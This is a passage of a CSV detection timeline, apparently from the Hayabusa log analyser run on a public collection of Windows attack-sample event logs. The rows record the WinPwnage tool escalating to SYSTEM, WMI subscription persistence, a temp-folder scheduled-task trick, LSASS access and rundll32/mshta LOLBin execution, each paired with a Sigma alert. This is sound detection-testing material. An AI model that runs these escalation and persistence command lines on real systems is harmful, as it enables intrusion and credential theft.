'Win32_PerfFormattedData_PerfOS_System'"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 1616 | PGUID: 
365ABB72-0D3F-5CD7-0000-001089471600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:39.746 +00:00,IEWIN7,19,info,,WMI Event Filter Activity,"Created | Namespace: ""root\\cimv2"" | Name: ""BotFilter82"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:50.090 +00:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -Embedding | LID: 0x3e7 | PID: 2544 | PGUID: 365ABB72-0D5A-5CD7-0000-001069031700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:54.762 +00:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 1832 | Src PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600 | Tgt PID: 444 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010F4570000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:54.762 +00:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 1832 | Src PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600 | Tgt PID: 492 | Tgt PGUID: 
365ABB72-8693-5CD7-0000-0010765E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:54.762 +00:00,IEWIN7,10,medium,CredAccess,Rare GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/proc_access_win_rare_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:54.762 +00:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/proc_access_win_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:54.887 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 2432 | PGUID: 365ABB72-0D5E-5CD7-0000-0010A1141700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:54.903 +00:00,IEWIN7,20,info,,WMI Event Consumer Activity,"Deleted | Type: Command Line | Name: ""BotConsumer23"" | Dst: ""c:\\Windows\\System32\\cmd.exe"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:54.981 +00:00,IEWIN7,19,info,,WMI Event Filter Activity,"Deleted | Namespace: ""root\\cimv2"" | Name: ""BotFilter82"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | User: 
IEWIN7\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:55.028 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 4084 | PGUID: 365ABB72-0D5E-5CD7-0000-0010E6241700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:55.090 +00:00,IEWIN7,21,info,,WMI Event Consumer To Filter Activity,"Deleted | Consumer: ""CommandLineEventConsumer.Name=\""BotConsumer23\"""" | Filter: ""__EventFilter.Name=\""BotFilter82\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:55.153 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3016 | PGUID: 365ABB72-0D5E-5CD7-0000-001047331700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 18:10:42.434 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 744 | 
PGUID: 365ABB72-1022-5CD7-0000-00105D081C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-11 18:10:42.637 +00:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x101ffb | Src PID: 744 | Src PGUID: 365ABB72-1022-5CD7-0000-00105D081C00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010765E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-11 18:10:42.668 +00:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\lsass.exe | LID: 0x3e7 | PID: 3248 | PGUID: 365ABB72-1022-5CD7-0000-0010DF121C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-11 18:10:42.668 +00:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 00:32:24.461 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x1384a | PID: 2740 | PGUID: 365ABB72-6998-5CD7-0000-00104E422200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 
00:32:30.211 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3876 | PGUID: 365ABB72-699E-5CD7-0000-001073582200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 00:32:30.211 +00:00,IEWIN7,1,high,Exec,Suspicius Schtasks From Env Var Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtasks_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 00:32:30.211 +00:00,IEWIN7,1,high,Exec,Suspicious Add Scheduled Task From User AppData Temp,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 00:32:30.211 +00:00,IEWIN7,1,high,Exec,Suspicious Add Scheduled Command Pattern,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtasks_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 00:32:30.211 +00:00,IEWIN7,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 00:32:30.227 +00:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\elevator | Process: C:\Windows\system32\svchost.exe | PID: 972 | PGUID: 
365ABB72-5DEA-5CD7-0000-001077D20000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 00:32:35.258 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3752 | PGUID: 365ABB72-69A3-5CD7-0000-0010306F2200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 00:32:35.352 +00:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service: | LID: 0x3e7 | PID: 1860 | PGUID: 365ABB72-69A3-5CD7-0000-00109D7F2200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 00:32:40.342 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3792 | PGUID: 365ABB72-69A8-5CD7-0000-0010C0982200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 12:52:43.702 +00:00,IEWIN7,7045,info,Persis,Service Installed,Name: WinPwnage | Path: %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe | Account: LocalSystem | Start Type: demand 
start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/System_7045_namedpipe_privesc.evtx +2019-05-12 13:30:32.931 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x13a10 | PID: 1332 | PGUID: 365ABB72-1FF8-5CD8-0000-00102A342000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:30:46.181 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\ieframe.url | Process: c:\python27\python.exe | PID: 1332 | PGUID: 365ABB72-1FF8-5CD8-0000-00102A342000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:30:46.400 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe | LID: 0x13a10 | PID: 2960 | PGUID: 365ABB72-2006-5CD8-0000-0010A2862300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:30:46.400 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:30:46.556 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: 
C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url | LID: 0x13a10 | PID: 2936 | PGUID: 365ABB72-2006-5CD8-0000-0010E0912300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:32:58.167 +00:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 3560 | PGUID: 365ABB72-208A-5CD8-0000-0010119B2400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:32:58.167 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:33:37.078 +00:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 1844 | PGUID: 365ABB72-20B1-5CD8-0000-001064D62400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:33:37.078 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:33:59.743 +00:00,IEWIN7,1,info,,Process 
Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 1416 | PGUID: 365ABB72-20C7-5CD8-0000-001021022500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:33:59.743 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:37:49.604 +00:00,IEWIN7,11,info,,File Created,Path: C:\ProgramData\calc.hta | Process: C:\Windows\Explorer.EXE | PID: 2940 | PGUID: 365ABB72-15B9-5CD8-0000-00103CEB0600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:38:00.523 +00:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 3856 | PGUID: 365ABB72-21B8-5CD8-0000-0010BADE2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:38:00.523 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:38:00.712 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" | 
Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta | LID: 0x13a10 | PID: 2964 | PGUID: 365ABB72-21B8-5CD8-0000-0010E4E82600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:38:00.712 +00:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:38:00.712 +00:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:38:00.712 +00:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation_sysmon/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:38:01.383 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" | LID: 0x13a10 | PID: 704 | PGUID: 365ABB72-21B9-5CD8-0000-0010FC002700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 13:55:56.626 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 
0x1364c | PID: 684 | PGUID: 365ABB72-25EC-5CD8-0000-0010CB0A1000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 13:56:12.329 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\shdocvw.url | Process: c:\python27\python.exe | PID: 684 | PGUID: 365ABB72-25EC-5CD8-0000-0010CB0A1000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 13:56:12.652 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe | LID: 0x1364c | PID: 2168 | PGUID: 365ABB72-25FC-5CD8-0000-0010906A1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 13:56:12.652 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 13:56:46.573 +00:00,IEWIN7,11,info,,File Created,Path: C:\Windows\inf\WmiApRpl\0009\WmiApRpl.ini | Process: \\?\C:\Windows\system32\wbem\WMIADAP.EXE | PID: 1512 | PGUID: 365ABB72-2615-5CD8-0000-001075171500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 13:56:46.605 +00:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\PerfStringBackup.INI | Process: \\?\C:\Windows\system32\wbem\WMIADAP.EXE | PID: 1512 | PGUID: 
365ABB72-2615-5CD8-0000-001075171500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 13:57:39.662 +00:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MpIdleTask | Process: C:\Windows\system32\svchost.exe | PID: 968 | PGUID: 365ABB72-2522-5CD8-0000-001080D10000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 13:58:39.850 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 1256 | PGUID: 365ABB72-268F-5CD8-0000-0010F4A51700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 13:58:54.897 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe | LID: 0x1364c | PID: 2728 | PGUID: 365ABB72-269E-5CD8-0000-001084F81A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 13:58:54.897 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 14:18:03.589 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: 
C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1364c | PID: 3320 | PGUID: 365ABB72-2B1B-5CD8-0000-0010CCC92500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-12 14:18:09.589 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 816 | PGUID: 365ABB72-2B21-5CD8-0000-001039DD2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-12 14:18:09.589 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-12 17:01:43.391 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135f2 | PID: 3788 | PGUID: 